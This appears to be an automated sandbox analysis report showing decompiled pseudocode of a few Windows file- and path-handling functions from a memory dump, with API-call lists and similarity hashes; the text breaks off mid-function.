                                              0x002ba93e
                                              0x00000000
                                              0x002ba93e
                                              0x002ac55a
                                              0x002ac55a
                                              0x00000000
                                              0x002ac55a
                                              0x002ac554
                                              0x002ac583
                                              0x002ac583
                                              0x002ac561
                                              0x002ac568
                                              0x002ac56a
                                              0x002ac56a
                                              0x00000000
                                              0x002ac56a
                                              0x00000000
                                              0x002ac581
                                              0x002ac58c
                                              0x002ac58c
                                              0x002ac58c
                                              0x002ac4de
                                              0x002ac4b9
                                              0x002ac58e
                                              0x002ac596
                                              0x002ba863
                                              0x002ba863
                                              0x002ba868
                                              0x002ba86a
                                              0x002ba86d
                                              0x002ba870
                                              0x00000000
                                              0x002ba870
                                              0x002ac3ae
                                              0x002ac3ae
                                              0x002ac3b1
                                              0x002ac3c0
                                              0x002ac3c2
                                              0x00000000
                                              0x002ac3c2
                                              0x00000000
                                              0x002ac3a8
                                              0x002ac2e7
                                              0x002a5f23
                                              0x002a5f24
                                              0x002a5f31
                                              0x002a5f31
                                              0x002a5ec9
                                              0x002a5ecb
                                              0x002a5ecc
                                              0x002a5ecc
                                              0x002a5ed2
                                              0x00000000
                                              0x00000000
                                              0x002a5eda
                                              0x002a5edd
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002a5edd
                                              0x00000000
                                              0x002a5ecc
                                              0x002a5ec7
                                              0x002a5eb5
                                              0x002a5ea0
                                              0x00000000

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: _wcsnicmpswscanf
                                              • String ID: :EOF
                                              • API String ID: 1534968528-551370653
                                              • Opcode ID: b6c420030671cd6fa4659113e42118dfef90bed0297af819cf6d6bf075481f5c
                                              • Instruction ID: 4a126ead0289ae1fa8562fd478886c37643f0daca621ba1a15a27712951fb035
                                              • Opcode Fuzzy Hash: b6c420030671cd6fa4659113e42118dfef90bed0297af819cf6d6bf075481f5c
                                              • Instruction Fuzzy Hash: 4BA10330A342569BDB20DF68C9847BAB7E4FF06350F24406AE842D7680EBB59D71DB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A58A4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135nativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 83%
                                              			E002A58A4() {
				intOrPtr _v8;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				void _v28;
				void _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __ecx;
				signed int _t22;
				intOrPtr _t29;
				long _t40;
				intOrPtr _t45;
				intOrPtr* _t49;
				intOrPtr* _t57;
				intOrPtr _t60;
				intOrPtr* _t62;
				void* _t67;

				_t44 = _t67;
				_push(_t45);
				_push(_t45);
				_v8 =  *((intOrPtr*)(_t67 + 4));
				_t22 =  *0x2e8064 & 0x000000ff;
				_v24 = _t45;
				_push(0);
				_push(0x2db8f8);
				_v16 = 0;
				_v20 = 0xc0000001;
				 *0x2cd560 = _t22;
				L002B82C1();
				if(_t22 != 0) {
					_t60 = 1;
					_v16 = 1;
				} else {
					_t48 =  *0x2e3cb8;
					if( *0x2e3cb8 == 0) {
						_t48 = 0x2e3ab0;
					}
					_t51 =  *0x2e3cc0;
					E002B36CB(_t44, _t48,  *0x2e3cc0, 0);
					 *0x2cd56c = 0;
					 *0x2cd5ac = 0;
					 *0x2cd564 = 1;
					 *0x2cd55c = 1;
					 *0x2cd0c0 = 1;
					_t29 =  *0x2cd5dc; // 0x0
					_t49 = 0x24;
					 *0x2cd5a8 = 0;
					 *0x2cd5a4 = 0;
					 *0x2cd568 = _t29;
					_t62 = E002B00B0(_t49);
					if(_t62 == 0) {
						L14:
						E002C9287(_t49);
						__imp__longjmp(0x2db8b8, 1);
						goto L15;
					} else {
						 *_t62 = 0;
						 *((intOrPtr*)(_t62 + 0x1c)) = 0;
						_t49 = 0x24;
						_v36 = _t62;
						 *((intOrPtr*)(_t62 + 0x20)) = 0;
						_t57 = E002B00B0(_t49);
						if(_t57 == 0) {
							goto L14;
						} else {
							 *_t57 = 0;
							 *((intOrPtr*)(_t57 + 0x1c)) = 0;
							_v40 = _t57;
							 *((intOrPtr*)(_t57 + 0x20)) = 0;
							E002A450B(_v24, _t62, _t57);
							_t40 = NtQueryInformationProcess(0xffffffff, 0x27,  &_v32, 4, 0);
							_v20 = _t40;
							if(_t40 >= 0) {
								_v28 = 2;
								NtSetInformationProcess(0xffffffff, 0x27,  &_v28, 4);
							}
							_t51 = _t57;
							_t49 = _t62;
							if( *0x2cd55c == 4) {
								L15:
								E002C8664(_t49, _t51);
								_t60 = _v16;
							} else {
								_t60 = E002A48E6(_t49, _t51);
								_v16 = _t60;
							}
						}
					}
					E002B274C(0x2e3d00, 0x104, L"%9d",  *0x2cd56c);
					E002AC108(_t49, 0x2336, 1, 0x2e3d00);
					 *0x2cd560 =  *0x2e8064 & 0x000000ff;
				}
				if(_v20 >= 0) {
					NtSetInformationProcess(0xffffffff, 0x27,  &_v32, 4);
				}
				return _t60;
			}






















                                              0x002a58a7
                                              0x002a58a9
                                              0x002a58aa
                                              0x002a58b5
                                              0x002a58be
                                              0x002a58c9
                                              0x002a58cc
                                              0x002a58cd
                                              0x002a58d2
                                              0x002a58d5
                                              0x002a58dc
                                              0x002a58e1
                                              0x002a58ea
                                              0x002b97fc
                                              0x002b97fd
                                              0x002a58f0
                                              0x002a58f0
                                              0x002a58f8
                                              0x002b9805
                                              0x002b9805
                                              0x002a58fe
                                              0x002a5905
                                              0x002a590c
                                              0x002a5913
                                              0x002a591b
                                              0x002a5920
                                              0x002a5925
                                              0x002a592a
                                              0x002a592f
                                              0x002a5930
                                              0x002a5936
                                              0x002a593c
                                              0x002a5946
                                              0x002a594a
                                              0x002b980f
                                              0x002b980f
                                              0x002b981b
                                              0x00000000
                                              0x002a5950
                                              0x002a5950
                                              0x002a5954
                                              0x002a5957
                                              0x002a5958
                                              0x002a595b
                                              0x002a5963
                                              0x002a5967
                                              0x00000000
                                              0x002a596d
                                              0x002a5972
                                              0x002a5976
                                              0x002a597a
                                              0x002a597d
                                              0x002a5980
                                              0x002a5991
                                              0x002a5997
                                              0x002a599c
                                              0x002a59a3
                                              0x002a59af
                                              0x002a59af
                                              0x002a59bc
                                              0x002a59be
                                              0x002a59c0
                                              0x002b9821
                                              0x002b9821
                                              0x002b9826
                                              0x002a59c6
                                              0x002a59cb
                                              0x002a59cd
                                              0x002a59cd
                                              0x002a59c0
                                              0x002a5967
                                              0x002a59e6
                                              0x002a59f3
                                              0x002a5a02
                                              0x002a5a02
                                              0x002a5a0b
                                              0x002a5a17
                                              0x002a5a17
                                              0x002a5a27

                                              APIs
                                              • _setjmp3.MSVCRT ref: 002A58E1
                                                • Part of subcall function 002B36CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,002A590A,00000000), ref: 002B36F0
                                                • Part of subcall function 002B00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000), ref: 002B00C1
                                                • Part of subcall function 002B00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000,?), ref: 002B00C8
                                              • NtQueryInformationProcess.NTDLL(000000FF,00000027,?,00000004,00000000), ref: 002A5991
                                              • NtSetInformationProcess.NTDLL(000000FF,00000027,?,00000004), ref: 002A59AF
                                              • NtSetInformationProcess.NTDLL(000000FF,00000027,?,00000004), ref: 002A5A17
                                              • longjmp.MSVCRT(002DB8B8,00000001,00000000), ref: 002B981B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
                                              • String ID: %9d
                                              • API String ID: 4212706909-2241623522
                                              • Opcode ID: d5760be779e5ad8a2be6b6b8834518ee408ce82f0f132f885d5102c5d8e95355
                                              • Instruction ID: 932b538fa190b600f15457571d89f45d3391fd51fb65cfe0130439fe6af53032
                                              • Opcode Fuzzy Hash: d5760be779e5ad8a2be6b6b8834518ee408ce82f0f132f885d5102c5d8e95355
                                              • Instruction Fuzzy Hash: A941F3B0E50351EFD710DF69AC49EAABBF4EB45760F10422AE614E7390EBB08951CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A5226, Relevance: 9.5, APIs: 6, Instructions: 458COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 85%
                                              			E002A5226(intOrPtr __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _v16;
				long _v28;
				char _v32;
				LPWSTR* _v36;
				void _v556;
				signed int _v560;
				signed short** _v564;
				WCHAR* _v568;
				LPWSTR* _v572;
				intOrPtr _v576;
				LPWSTR* _v580;
				signed int _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t146;
				signed short** _t160;
				intOrPtr _t164;
				LPWSTR* _t165;
				intOrPtr _t167;
				intOrPtr _t169;
				signed int _t176;
				void* _t179;
				signed short** _t183;
				intOrPtr _t186;
				intOrPtr _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				signed int _t194;
				void* _t195;
				signed short _t197;
				intOrPtr _t199;
				void* _t205;
				void* _t207;
				void* _t209;
				signed short _t211;
				void* _t213;
				WCHAR* _t222;
				signed short* _t225;
				intOrPtr* _t226;
				void* _t228;
				intOrPtr _t230;
				signed short* _t235;
				signed int _t236;
				intOrPtr* _t244;
				short* _t247;
				void* _t248;
				intOrPtr* _t249;
				intOrPtr* _t256;
				intOrPtr* _t259;
				void* _t262;
				intOrPtr* _t263;
				signed short* _t266;
				signed short* _t267;
				intOrPtr* _t269;
				signed int _t273;
				signed int _t276;
				signed short* _t280;
				void* _t288;
				signed short* _t289;
				void* _t292;
				short* _t293;
				void* _t297;
				short _t298;
				intOrPtr* _t299;
				intOrPtr* _t303;
				signed int _t306;
				signed short* _t307;
				void* _t314;
				intOrPtr* _t316;
				intOrPtr* _t322;
				LPWSTR* _t324;
				void* _t325;
				void* _t326;
				WCHAR* _t327;
				void* _t328;
				void* _t331;
				intOrPtr _t333;
				void* _t334;
				intOrPtr _t336;
				intOrPtr* _t340;
				intOrPtr* _t341;
				short* _t344;
				void* _t346;
				intOrPtr* _t347;
				signed int _t349;
				intOrPtr _t353;
				intOrPtr _t357;
				signed int _t363;

				_t295 = __edx;
				_t236 = _t363;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t236 + 4));
				_t361 = (_t363 & 0xfffffff8) + 4;
				_t146 =  *0x2cd0b4; // 0x40f69e4c
				_v16 = _t146 ^ (_t363 & 0xfffffff8) + 0x00000004;
				_t322 =  *((intOrPtr*)(_t236 + 8));
				_t333 = __ecx;
				_v28 = 0x104;
				_v584 = __edx;
				_v576 = __ecx;
				_v568 = _t322;
				_v572 = 0;
				_v580 = 0;
				_v36 = 0;
				_v32 = 1;
				memset( &_v556, 0, 0x104);
				if(E002B0C70( &_v556, ((0 | _v32 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_t324 = 1;
					L25:
					__imp__??_V@YAXPAX@Z(_v36);
					_pop(_t325);
					_pop(_t334);
					return E002B6FD0(_t324, _t236, _v16 ^ _t361, _t295, _t325, _t334);
				}
				_t160 =  *(_v584 + 0x20);
				_v564 = _t160;
				if(_t160 == 0) {
					_t161 =  *0x2e3cb8;
					if( *0x2e3cb8 == 0) {
						_t161 = 0x2e3ab0;
					}
					E002B1040(_t322,  *(_t236 + 0xc), _t161);
					_t244 = _t322;
					_v572 = 0;
					_t326 = 2;
					_t297 = _t244 + 2;
					do {
						_t164 =  *_t244;
						_t244 = _t244 + _t326;
					} while (_t164 != 0);
					_t165 = _v568;
					_t336 = _v576;
					_t298 = 0x5c;
					_t247 = _t165 + (_t244 - _t297 >> 1) * 2;
					if(_t165 >= _t247) {
						L38:
						 *_t247 = _t298;
						 *((short*)(_t247 + 2)) = 0;
						L39:
						if(( *(_t336 + 0x1c) & 0x00000200) == 0) {
							L54:
							_t299 = _v568;
							_t248 = _t299 + 2;
							do {
								_t167 =  *_t299;
								_t299 = _t299 + _t326;
							} while (_t167 != 0);
							_v572 = _t299 - _t248 >> 1;
							_t340 =  *((intOrPtr*)(_v576 + 0x18)) + 0x2c;
							_t295 = 0;
							_t249 = _t340;
							_v560 = _t249 + 2;
							do {
								_t169 =  *_t249;
								_t249 = _t249 + _t326;
							} while (_t169 != 0);
							_t327 = _v568;
							if( &(_v572[0]) + (_t249 - _v560 >> 1) > 0x7fe7) {
								L53:
								_t341 = _v564;
								L89:
								_v580 = 1;
								L20:
								if( *((intOrPtr*)(_t236 + 0x10)) == 0) {
									L24:
									_t324 = _v580;
									goto L25;
								}
								if(_t341 == 0 || ( *(_t341 + 0x1c) & 0x00002000) == 0) {
									if(( *(_v584 + 0x1c) & 0x00002000) != 0) {
										goto L90;
									}
								} else {
									L90:
									_t328 = CreateFileW(_t327, 0x80000000, 1, 0, 3, 0x80, 0);
									if(_t328 != 0xffffffff) {
										_t176 = GetFileType(_t328);
										CloseHandle(_t328);
										if((_t176 & 0xffff7fff) == 1) {
											_t344 = _v568;
											_t295 = 0x400023d3;
											_t179 = E002C9583(_t344, 0x400023d3, 0x400023d4);
											if(_t179 == 0) {
												 *_t344 = 0;
											} else {
												if(_t179 == 0) {
													_t183 = _v564;
													if(_t183 == 0) {
														_t183 = _v584;
													}
													 *(_t183 + 0x1c) =  *(_t183 + 0x1c) & 0xffffdfff;
												}
											}
										}
									}
								}
								goto L24;
							}
							_push(_t340);
							L80:
							_t295 =  *(_t236 + 0xc);
							E002B18C0(_t327,  *(_t236 + 0xc));
							_t341 = _v564;
							goto L20;
						}
						_t303 =  *((intOrPtr*)(_t336 + 0x18)) + 0x234;
						_t256 = _t303;
						_v572 = _t303;
						_v560 = _t256 + 2;
						do {
							_t186 =  *_t256;
							_t256 = _t256 + _t326;
						} while (_t186 != 0);
						if(_t256 == _v560) {
							goto L54;
						}
						_t259 = _t303;
						_t295 = 0;
						_t346 = _t259 + 2;
						do {
							_t187 =  *_t259;
							_t259 = _t259 + _t326;
						} while (_t187 != 0);
						if(_t259 == _t346) {
							L52:
							_t327 = _v568;
							goto L53;
						}
						_t347 = _v568;
						_t262 = _t347 + 2;
						do {
							_t188 =  *_t347;
							_t347 = _t347 + _t326;
						} while (_t188 != 0);
						_t263 = _v572;
						_t349 = _t347 - _t262 >> 1;
						_t72 = _t263 + 2; // 0x2
						_v560 = _t72;
						do {
							_t190 =  *_t263;
							_t263 = _t263 + _t326;
						} while (_t190 != 0);
						_t295 = _v572;
						if(_t349 + 1 + (_t263 - _v560 >> 1) > 0x7fe7) {
							goto L52;
						}
						_t327 = _v568;
						_push(_t295);
						goto L80;
					} else {
						goto L33;
					}
					do {
						L33:
						if( *_t165 == _t298) {
							_v572 = _t165;
						}
						_t165 = _t165 + _t326;
					} while (_t165 < _t247);
					if(_v572 == 0 || _v572 < _t247 - 2) {
						goto L38;
					} else {
						goto L39;
					}
				}
				_t266 =  *_t160;
				_t331 = 2;
				_t194 =  *_t266 & 0x0000ffff;
				_t306 = _t194;
				_v560 = _t306;
				if(_t194 == 0) {
					L6:
					_t195 = 0x3a;
					if(_t306 == _t195) {
						if(( *(_t333 + 0x1c) & 0x00000200) == 0) {
							L73:
							_t307 =  *_v564;
							_t267 =  &(_t307[1]);
							do {
								_t197 =  *_t307;
								_t307 = _t307 + _t331;
							} while (_t197 != 0);
							_t295 = _t307 - _t267 >> 1;
							_t269 =  *((intOrPtr*)(_v576 + 0x18)) + 0x2c;
							_v560 = _t269 + 2;
							do {
								_t199 =  *_t269;
								_t269 = _t269 + _t331;
							} while (_t199 != 0);
							_t353 = _v576;
							_t327 = _v568;
							if(_t295 + 1 + (_t269 - _v560 >> 1) > 0x7fe7) {
								goto L53;
							}
							E002B1040(_t327,  *(_t236 + 0xc),  *_v564);
							_t205 =  *((intOrPtr*)(_t353 + 0x18)) + 0x2c;
							L79:
							_push(_t205);
							goto L80;
						}
						_t295 =  *((intOrPtr*)(_t333 + 0x18)) + 0x234;
						_t273 = _t295;
						_v560 = _t273 + 2;
						do {
							_t207 =  *_t273;
							_t273 = _t273 + _t331;
						} while (_t207 != 0);
						if(_t273 == _v560) {
							goto L73;
						}
						_t276 = _t295;
						_v560 = _t276 + 2;
						do {
							_t209 =  *_t276;
							_t276 = _t276 + _t331;
						} while (_t209 != 0);
						if(_t276 == _v560) {
							goto L52;
						}
						_t280 =  *_v564;
						_v560 =  &(_t280[1]);
						do {
							_t211 =  *_t280;
							_t280 = _t280 + _t331;
						} while (_t211 != 0);
						_t357 = _v576;
						_v572 = _t280 - _v560 >> 1;
						_v560 = _t295 + 2;
						do {
							_t213 =  *_t295;
							_t295 = _t295 + _t331;
						} while (_t213 != 0);
						if( &(_v572[0]) + _t295 > 0x7fe7) {
							goto L52;
						}
						_t327 = _v568;
						E002B1040(_t327,  *(_t236 + 0xc),  *_v564);
						_t205 =  *((intOrPtr*)(_t357 + 0x18)) + 0x234;
						goto L79;
					}
					if( *((intOrPtr*)(_t236 + 0x10)) == 0) {
						L17:
						_t341 = _v564;
						_t327 = _v568;
						_t295 =  *(_t236 + 0xc);
						if(E002A5400(_t327,  *(_t236 + 0xc),  *_t341,  *((intOrPtr*)(_t333 + 4))) != 0) {
							E002C985A(_t220);
							_v580 = 1;
						}
						_t222 = _v36;
						if(_t222 == 0) {
							_t222 =  &_v556;
						}
						if(GetFullPathNameW(_t327, _v28, _t222, 0) > 0x7fe7) {
							_t288 = 0x6f;
							E002C985A(_t288);
							goto L89;
						} else {
							goto L20;
						}
					}
					_t313 = _v564;
					_t225 =  *_v564;
					_t289 = _t225;
					if(_v560 == 0) {
						L12:
						if( *_t289 != 0x2a) {
							goto L17;
						}
						_t226 = E002A5846( *_t313);
						_t314 = 0x5c;
						if( *_t226 != _t314) {
							goto L17;
						}
						_t292 = E002B2349( *((intOrPtr*)(_t333 + 4)), _t314);
						if(_t292 == 0) {
							_t293 =  *((intOrPtr*)(_t333 + 4));
							_t228 = 0x3a;
							if( *((intOrPtr*)(_t293 + 2)) == _t228) {
								_t293 = _t293 + 4;
							}
						} else {
							_t293 = _t292 + _t331;
						}
						if(( *(_t333 + 0x1c) & 0x00000200) != 0) {
							_t316 =  *((intOrPtr*)(_t333 + 0x18)) + 0x234;
							_v560 = _t316 + 2;
							do {
								_t230 =  *_t316;
								_t316 = _t316 + _t331;
							} while (_t230 != _v572);
							if(_t316 != _v560) {
								 *_t293 = 0;
								E002B18C0( *((intOrPtr*)(_t333 + 4)),  *((intOrPtr*)(_t333 + 8)),  *((intOrPtr*)(_t333 + 0x18)) + 0x234);
							}
						}
						goto L17;
					} else {
						goto L10;
						L10:
						_t289 = _t225;
						_t225 = _t225 + _t331;
						if( *_t225 != 0) {
							goto L10;
						} else {
							_t333 = _v576;
							goto L12;
						}
					}
				} else {
					goto L4;
					L4:
					_t235 = _t266;
					_t266 = _t266 + _t331;
					if( *_t266 != 0) {
						goto L4;
					} else {
						_t306 =  *_t235 & 0x0000ffff;
						goto L6;
					}
				}
			}





























































































                                              0x002a5226
                                              0x002a5229
                                              0x002a522b
                                              0x002a522c
                                              0x002a5237
                                              0x002a523b
                                              0x002a5243
                                              0x002a524a
                                              0x002a524f
                                              0x002a5257
                                              0x002a5259
                                              0x002a525e
                                              0x002a526c
                                              0x002a5273
                                              0x002a5279
                                              0x002a527f
                                              0x002a5285
                                              0x002a5288
                                              0x002a528c
                                              0x002a52b5
                                              0x002a53f5
                                              0x002a53d2
                                              0x002a53d5
                                              0x002a53e1
                                              0x002a53e4
                                              0x002a53f0
                                              0x002a53f0
                                              0x002a52c1
                                              0x002a52c4
                                              0x002a52cc
                                              0x002b915f
                                              0x002b9166
                                              0x002b9168
                                              0x002b9168
                                              0x002b9173
                                              0x002b9178
                                              0x002b917e
                                              0x002b9186
                                              0x002b9187
                                              0x002b918a
                                              0x002b918a
                                              0x002b918d
                                              0x002b918f
                                              0x002b9194
                                              0x002b919c
                                              0x002b91a6
                                              0x002b91a7
                                              0x002b91ac
                                              0x002b91d3
                                              0x002b91d5
                                              0x002b91d8
                                              0x002b91dc
                                              0x002b91e3
                                              0x002b929f
                                              0x002b929f
                                              0x002b92a7
                                              0x002b92aa
                                              0x002b92aa
                                              0x002b92ad
                                              0x002b92af
                                              0x002b92be
                                              0x002b92c7
                                              0x002b92ca
                                              0x002b92cc
                                              0x002b92d1
                                              0x002b92d7
                                              0x002b92d7
                                              0x002b92da
                                              0x002b92dc
                                              0x002b92ed
                                              0x002b92fd
                                              0x002b9294
                                              0x002b9294
                                              0x002b94f9
                                              0x002b94f9
                                              0x002a53a5
                                              0x002a53a9
                                              0x002a53cc
                                              0x002a53cc
                                              0x00000000
                                              0x002a53cc
                                              0x002a53b2
                                              0x002a53c6
                                              0x00000000
                                              0x00000000
                                              0x002b9508
                                              0x002b9508
                                              0x002b9521
                                              0x002b9526
                                              0x002b952d
                                              0x002b953c
                                              0x002b9547
                                              0x002b954d
                                              0x002b9553
                                              0x002b9566
                                              0x002b9568
                                              0x002b9591
                                              0x002b956a
                                              0x002b956d
                                              0x002b9573
                                              0x002b957b
                                              0x002b957d
                                              0x002b957d
                                              0x002b9583
                                              0x002b9583
                                              0x002b956d
                                              0x002b9568
                                              0x002b9547
                                              0x002b9526
                                              0x00000000
                                              0x002a53b2
                                              0x002b92ff
                                              0x002b9462
                                              0x002b9462
                                              0x002b9467
                                              0x002b946c
                                              0x00000000
                                              0x002b946c
                                              0x002b91ec
                                              0x002b91f4
                                              0x002b91f6
                                              0x002b91ff
                                              0x002b9205
                                              0x002b9205
                                              0x002b9208
                                              0x002b920a
                                              0x002b9217
                                              0x00000000
                                              0x00000000
                                              0x002b921d
                                              0x002b921f
                                              0x002b9221
                                              0x002b9224
                                              0x002b9224
                                              0x002b9227
                                              0x002b9229
                                              0x002b9232
                                              0x002b928e
                                              0x002b928e
                                              0x00000000
                                              0x002b928e
                                              0x002b9234
                                              0x002b923c
                                              0x002b923f
                                              0x002b923f
                                              0x002b9242
                                              0x002b9244
                                              0x002b924b
                                              0x002b9251
                                              0x002b9255
                                              0x002b9258
                                              0x002b925e
                                              0x002b925e
                                              0x002b9261
                                              0x002b9263
                                              0x002b9271
                                              0x002b9280
                                              0x00000000
                                              0x00000000
                                              0x002b9282
                                              0x002b9288
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b91ae
                                              0x002b91ae
                                              0x002b91b1
                                              0x002b91b3
                                              0x002b91b3
                                              0x002b91b9
                                              0x002b91bb
                                              0x002b91c6
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b91c6
                                              0x002a52d2
                                              0x002a52d6
                                              0x002a52d7
                                              0x002a52da
                                              0x002a52dc
                                              0x002a52e5
                                              0x002a52f5
                                              0x002a52f7
                                              0x002a52fb
                                              0x002b930c
                                              0x002b93e9
                                              0x002b93f1
                                              0x002b93f3
                                              0x002b93f6
                                              0x002b93f6
                                              0x002b93f9
                                              0x002b93fb
                                              0x002b9408
                                              0x002b940d
                                              0x002b9415
                                              0x002b941b
                                              0x002b941b
                                              0x002b941e
                                              0x002b9420
                                              0x002b942e
                                              0x002b9434
                                              0x002b9443
                                              0x00000000
                                              0x00000000
                                              0x002b9456
                                              0x002b945e
                                              0x002b9461
                                              0x002b9461
                                              0x00000000
                                              0x002b9461
                                              0x002b9315
                                              0x002b931d
                                              0x002b9322
                                              0x002b9328
                                              0x002b9328
                                              0x002b932b
                                              0x002b932d
                                              0x002b933a
                                              0x00000000
                                              0x00000000
                                              0x002b9340
                                              0x002b9347
                                              0x002b934d
                                              0x002b934d
                                              0x002b9350
                                              0x002b9352
                                              0x002b935f
                                              0x00000000
                                              0x00000000
                                              0x002b936d
                                              0x002b9372
                                              0x002b9378
                                              0x002b9378
                                              0x002b937b
                                              0x002b937d
                                              0x002b938b
                                              0x002b9393
                                              0x002b939b
                                              0x002b93a1
                                              0x002b93a1
                                              0x002b93a4
                                              0x002b93a6
                                              0x002b93c1
                                              0x00000000
                                              0x00000000
                                              0x002b93cd
                                              0x002b93da
                                              0x002b93e2
                                              0x00000000
                                              0x002b93e2
                                              0x002a5305
                                              0x002a5362
                                              0x002a5365
                                              0x002a536b
                                              0x002a5373
                                              0x002a537f
                                              0x002b94dd
                                              0x002b94e2
                                              0x002b94e2
                                              0x002a5385
                                              0x002a538a
                                              0x002a53f8
                                              0x002a53f8
                                              0x002a539f
                                              0x002b94f3
                                              0x002b94f4
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002a539f
                                              0x002a530f
                                              0x002a5315
                                              0x002a5317
                                              0x002a5319
                                              0x002a532c
                                              0x002a5330
                                              0x00000000
                                              0x00000000
                                              0x002a5334
                                              0x002a533b
                                              0x002a533f
                                              0x00000000
                                              0x00000000
                                              0x002a5349
                                              0x002a534d
                                              0x002b9477
                                              0x002b947c
                                              0x002b9481
                                              0x002b9487
                                              0x002b9487
                                              0x002a5353
                                              0x002a5353
                                              0x002a5353
                                              0x002a535c
                                              0x002b9492
                                              0x002b949b
                                              0x002b94a1
                                              0x002b94a1
                                              0x002b94a4
                                              0x002b94a6
                                              0x002b94b7
                                              0x002b94bf
                                              0x002b94d1
                                              0x002b94d1
                                              0x002b94b7
                                              0x00000000
                                              0x002a531b
                                              0x002a531b
                                              0x002a531d
                                              0x002a531d
                                              0x002a531f
                                              0x002a5324
                                              0x00000000
                                              0x002a5326
                                              0x002a5326
                                              0x00000000
                                              0x002a5326
                                              0x002a5324
                                              0x002a52e7
                                              0x002a52e7
                                              0x002a52e9
                                              0x002a52e9
                                              0x002a52eb
                                              0x002a52f0
                                              0x00000000
                                              0x002a52f2
                                              0x002a52f2
                                              0x00000000
                                              0x002a52f2
                                              0x002a52f0

                                              APIs
                                              • memset.MSVCRT ref: 002A528C
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,00000000,?), ref: 002A5394
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002A53D5
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: memset$FullNamePath
                                              • String ID:
                                              • API String ID: 3158150540-0
                                              • Opcode ID: 8c05f901dd4bc9c23ab4ffef5fa43ff9c9ed05009dae12a454a8075a6f58ed73
                                              • Instruction ID: 99d6baf15d3f245fdf4c67f1157447e82aa7592822ba73b64ae7ce2f0e0339bc
                                              • Opcode Fuzzy Hash: 8c05f901dd4bc9c23ab4ffef5fa43ff9c9ed05009dae12a454a8075a6f58ed73
                                              • Instruction Fuzzy Hash: 6502B435A101269BCF28DF68DC987AAB3B1FF88354F1881E9D90997250D774AED2CF40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B245C, Relevance: 9.2, APIs: 6, Instructions: 154fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E002B245C(WCHAR* __ecx, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				struct _WIN32_FIND_DATAW _v604;
				signed int _v608;
				void _v612;
				signed int _v616;
				void* _v620;
				intOrPtr _v624;
				WCHAR* _v628;
				void* _v632;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				intOrPtr _t44;
				void* _t45;
				void _t47;
				void* _t53;
				void _t54;
				void _t58;
				char* _t69;
				char* _t71;
				intOrPtr* _t73;
				signed int _t75;
				void* _t76;
				WCHAR* _t77;
				void* _t80;
				void* _t81;
				signed int _t83;
				void* _t84;
				void* _t91;
				void* _t96;
				void* _t97;
				short* _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				int _t104;
				void* _t105;
				signed int _t106;
				signed int _t108;

				_t90 = __edx;
				_t77 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x274;
				_t42 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t42 ^ _t108;
				_t73 = __ecx;
				_v616 = __edx;
				_v628 = __ecx;
				_v624 = 0;
				_t99 =  &(__ecx[1]);
				do {
					_t44 =  *_t73;
					_t73 = _t73 + 2;
				} while (_t44 != 0);
				_t75 = _t73 - _t99 >> 1;
				if(_t75 > __edx) {
					L21:
					_t45 = 0;
				} else {
					_t97 =  &(__ecx[3]);
					_t101 = _t97;
					_v632 = _t101;
					do {
						_t47 =  *_t97 & 0x0000ffff;
						_v612 = _t47;
						if(_t47 == 0 || _t47 == 0x5c) {
